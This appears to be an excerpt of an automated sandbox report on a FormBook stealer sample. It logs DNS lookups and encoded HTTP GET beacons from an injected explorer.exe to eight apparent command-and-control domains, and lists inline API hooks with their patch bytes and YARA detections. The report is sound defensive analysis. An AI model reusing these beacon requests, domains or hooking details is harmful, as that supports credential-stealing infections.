                                                                                                Oct 24, 2023 08:30:53.442823887 CEST8049722104.21.69.174192.168.2.11
                                                                                                Oct 24, 2023 08:30:53.442944050 CEST4972280192.168.2.11104.21.69.174
                                                                                                Oct 24, 2023 08:30:53.443054914 CEST4972280192.168.2.11104.21.69.174
                                                                                                Oct 24, 2023 08:30:53.546045065 CEST8049722104.21.69.174192.168.2.11
                                                                                                Oct 24, 2023 08:30:53.931694031 CEST4972280192.168.2.11104.21.69.174
                                                                                                Oct 24, 2023 08:30:54.034116983 CEST8049722104.21.69.174192.168.2.11
                                                                                                Oct 24, 2023 08:30:54.034203053 CEST4972280192.168.2.11104.21.69.174
                                                                                                Oct 24, 2023 08:31:16.411492109 CEST4972380192.168.2.11104.247.82.51
                                                                                                Oct 24, 2023 08:31:16.540956020 CEST8049723104.247.82.51192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.541119099 CEST4972380192.168.2.11104.247.82.51
                                                                                                Oct 24, 2023 08:31:16.668318033 CEST8049723104.247.82.51192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.668472052 CEST4972380192.168.2.11104.247.82.51
                                                                                                Oct 24, 2023 08:31:16.799911976 CEST8049723104.247.82.51192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.799953938 CEST8049723104.247.82.51192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.799973011 CEST8049723104.247.82.51192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.800214052 CEST4972380192.168.2.11104.247.82.51
                                                                                                Oct 24, 2023 08:31:16.800255060 CEST4972380192.168.2.11104.247.82.51
                                                                                                Oct 24, 2023 08:31:16.931246996 CEST8049723104.247.82.51192.168.2.11
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 24, 2023 08:27:49.527225971 CEST5806953192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:27:49.632117987 CEST53580691.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:28:08.979837894 CEST6396753192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:28:09.278362036 CEST53639671.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:28:29.229845047 CEST5634753192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:28:29.746062040 CEST53563471.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:29:10.109508038 CEST6266653192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:29:10.330265045 CEST53626661.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.448321104 CEST5997253192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:29:30.617741108 CEST53599721.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:29:50.823311090 CEST6181153192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:29:50.934587002 CEST53618111.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:30:11.265486956 CEST5125553192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:30:11.370093107 CEST53512551.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:30:32.870191097 CEST5793153192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:30:33.111912012 CEST53579311.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:30:53.229465008 CEST5491653192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:30:53.339016914 CEST53549161.1.1.1192.168.2.11
                                                                                                Oct 24, 2023 08:31:16.296188116 CEST6027353192.168.2.111.1.1.1
                                                                                                Oct 24, 2023 08:31:16.410104036 CEST53602731.1.1.1192.168.2.11
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 24, 2023 08:27:49.527225971 CEST192.168.2.111.1.1.10x9c48Standard query (0)www.zg9tywlubmftzw5ldzi0mdm.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:28:08.979837894 CEST192.168.2.111.1.1.10x74efStandard query (0)www.fhstbanknigeria.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:28:29.229845047 CEST192.168.2.111.1.1.10x606aStandard query (0)www.m-baer.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:10.109508038 CEST192.168.2.111.1.1.10xf3eaStandard query (0)www.totalkfood.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:30.448321104 CEST192.168.2.111.1.1.10xadf2Standard query (0)www.cryptarrow.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:50.823311090 CEST192.168.2.111.1.1.10xe58bStandard query (0)www.starryallure.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:11.265486956 CEST192.168.2.111.1.1.10x559cStandard query (0)www.roundaboutlogistics.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:32.870191097 CEST192.168.2.111.1.1.10xcdf4Standard query (0)www.nightoracle.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:53.229465008 CEST192.168.2.111.1.1.10xadd8Standard query (0)www.mtauratarnt.comA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:31:16.296188116 CEST192.168.2.111.1.1.10x70c7Standard query (0)www.robertjamesfineclothing.comA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 24, 2023 08:27:49.632117987 CEST1.1.1.1192.168.2.110x9c48Name error (3)www.zg9tywlubmftzw5ldzi0mdm.comnonenoneA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:28:09.278362036 CEST1.1.1.1192.168.2.110x74efNo error (0)www.fhstbanknigeria.com103.224.212.212A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:28:29.746062040 CEST1.1.1.1192.168.2.110x606aNo error (0)www.m-baer.com35.186.223.180A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:10.330265045 CEST1.1.1.1192.168.2.110xf3eaNo error (0)www.totalkfood.comtotalkfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:10.330265045 CEST1.1.1.1192.168.2.110xf3eaNo error (0)totalkfood.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:10.330265045 CEST1.1.1.1192.168.2.110xf3eaNo error (0)totalkfood.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:30.617741108 CEST1.1.1.1192.168.2.110xadf2No error (0)www.cryptarrow.comcname.beehiiv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:30.617741108 CEST1.1.1.1192.168.2.110xadf2No error (0)cname.beehiiv.com104.19.157.23A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:30.617741108 CEST1.1.1.1192.168.2.110xadf2No error (0)cname.beehiiv.com104.19.156.23A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:50.934587002 CEST1.1.1.1192.168.2.110xe58bNo error (0)www.starryallure.comac9ba1-4.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:50.934587002 CEST1.1.1.1192.168.2.110xe58bNo error (0)ac9ba1-4.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 24, 2023 08:29:50.934587002 CEST1.1.1.1192.168.2.110xe58bNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:11.370093107 CEST1.1.1.1192.168.2.110x559cName error (3)www.roundaboutlogistics.comnonenoneA (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:33.111912012 CEST1.1.1.1192.168.2.110xcdf4No error (0)www.nightoracle.com103.224.212.210A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:53.339016914 CEST1.1.1.1192.168.2.110xadd8No error (0)www.mtauratarnt.com104.21.69.174A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:30:53.339016914 CEST1.1.1.1192.168.2.110xadd8No error (0)www.mtauratarnt.com172.67.210.176A (IP address)IN (0x0001)false
                                                                                                Oct 24, 2023 08:31:16.410104036 CEST1.1.1.1192.168.2.110x70c7No error (0)www.robertjamesfineclothing.com104.247.82.51A (IP address)IN (0x0001)false
                                                                                                • www.fhstbanknigeria.com
                                                                                                • www.m-baer.com
                                                                                                • www.totalkfood.com
                                                                                                • www.cryptarrow.com
                                                                                                • www.starryallure.com
                                                                                                • www.nightoracle.com
                                                                                                • www.mtauratarnt.com
                                                                                                • www.robertjamesfineclothing.com
                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.1149713103.224.212.21280C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:28:09.457639933 CEST76OUTGET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.fhstbanknigeria.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:28:09.655143976 CEST103INHTTP/1.1 302 Found
                                                                                                date: Tue, 24 Oct 2023 06:28:09 GMT
                                                                                                server: Apache
                                                                                                set-cookie: __tad=1698128889.2787581; expires=Fri, 21-Oct-2033 06:28:09 GMT; Max-Age=315360000
                                                                                                location: http://ww25.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs&subid1=20231024-1728-0943-acd7-e1b6aba9e653
                                                                                                content-length: 2
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                connection: close
                                                                                                Data Raw: 0a 0a
                                                                                                Data Ascii:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.114971435.186.223.18080C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:28:29.857367039 CEST104OUTGET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.m-baer.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:28:30.093662977 CEST104INHTTP/1.1 403 Forbidden
                                                                                                Content-Length: 134
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Date: Tue, 24 Oct 2023 06:28:30 GMT
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e
                                                                                                Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.11497163.33.130.19080C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:29:11.748632908 CEST115OUTGET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.totalkfood.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:29:11.853933096 CEST115INHTTP/1.1 403 Forbidden
                                                                                                Server: openresty
                                                                                                Date: Tue, 24 Oct 2023 06:29:11 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 291
                                                                                                Connection: close
                                                                                                ETag: "65271109-123"
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                3192.168.2.1149717104.19.157.2380C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:29:30.721718073 CEST117OUTGET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.cryptarrow.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:29:30.826714993 CEST117INHTTP/1.1 409 Conflict
                                                                                                Date: Tue, 24 Oct 2023 06:29:30 GMT
                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                Content-Length: 16
                                                                                                Connection: close
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Referrer-Policy: same-origin
                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 81b02a734a8781df-IAD
                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                                                Data Ascii: error code: 1001


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                4192.168.2.114971823.227.38.7480C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:29:51.038615942 CEST118OUTGET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.starryallure.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:29:51.155780077 CEST120INHTTP/1.1 403 Forbidden
                                                                                                Date: Tue, 24 Oct 2023 06:29:51 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 4515
                                                                                                Connection: close
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Referrer-Policy: same-origin
                                                                                                Cache-Control: max-age=15
                                                                                                Expires: Tue, 24 Oct 2023 06:30:06 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QFe%2BigM2W9xjZuxxhYuD21NF6hfLHhuYwiXnDDNNDNU9n7pvn3nhDKB7RfiTsFdJVKNDYT%2F5%2B8jgEa9mt8UfwfBlS6QwOE%2F5PgPz%2BprPHaw9wx2Qw%2FsapuixXTY3twvZjrTMszY"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                Server-Timing: cfRequestDuration;dur=13.999939
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 81b02af23c27061b-IAD
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f
                                                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="no
                                                                                                Oct 24, 2023 08:29:51.155838966 CEST121INData Raw: 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c
                                                                                                Data Ascii: index, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
                                                                                                Oct 24, 2023 08:29:51.155880928 CEST122INData Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20
                                                                                                Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two">
                                                                                                Oct 24, 2023 08:29:51.155919075 CEST123INData Raw: 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d
                                                                                                Data Ascii: order-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">81b02af23c27061b</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span
                                                                                                Oct 24, 2023 08:29:51.155956984 CEST124INData Raw: 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63
                                                                                                Data Ascii: </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                5192.168.2.1149721103.224.212.21080C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:30:33.279150009 CEST160OUTGET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.nightoracle.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:30:33.469585896 CEST161INHTTP/1.1 302 Found
                                                                                                date: Tue, 24 Oct 2023 06:30:33 GMT
                                                                                                server: Apache
                                                                                                set-cookie: __tad=1698129033.1062467; expires=Fri, 21-Oct-2033 06:30:33 GMT; Max-Age=315360000
                                                                                                location: http://ww25.nightoracle.com/rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs&subid1=20231024-1730-3357-9cb2-2a616f5fefdf
                                                                                                content-length: 2
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                connection: close
                                                                                                Data Raw: 0a 0a
                                                                                                Data Ascii:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                6192.168.2.1149722104.21.69.17480C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:30:53.443054914 CEST162OUTGET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.mtauratarnt.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                7192.168.2.1149723104.247.82.5180C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Oct 24, 2023 08:31:16.668472052 CEST163OUTGET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1
                                                                                                Host: www.robertjamesfineclothing.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Oct 24, 2023 08:31:16.799953938 CEST163INHTTP/1.1 403 Forbidden
                                                                                                Server: nginx
                                                                                                Date: Tue, 24 Oct 2023 06:31:16 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 146
                                                                                                Connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                Code Manipulations

                                                                                                Function NameHook TypeActive in Processes
                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                GetMessageAINLINEexplorer.exe
                                                                                                Function NameHook TypeNew Data
                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2

                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:08:27:09
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Users\user\Desktop\GCeHcfCef8.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\GCeHcfCef8.exe
                                                                                                Imagebase:0xd30000
                                                                                                File size:832'512 bytes
                                                                                                MD5 hash:841031A37159398B8EEBCA7BB7EFF56B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:08:27:10
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Users\user\Desktop\GCeHcfCef8.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\GCeHcfCef8.exe
                                                                                                Imagebase:0xc90000
                                                                                                File size:832'512 bytes
                                                                                                MD5 hash:841031A37159398B8EEBCA7BB7EFF56B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
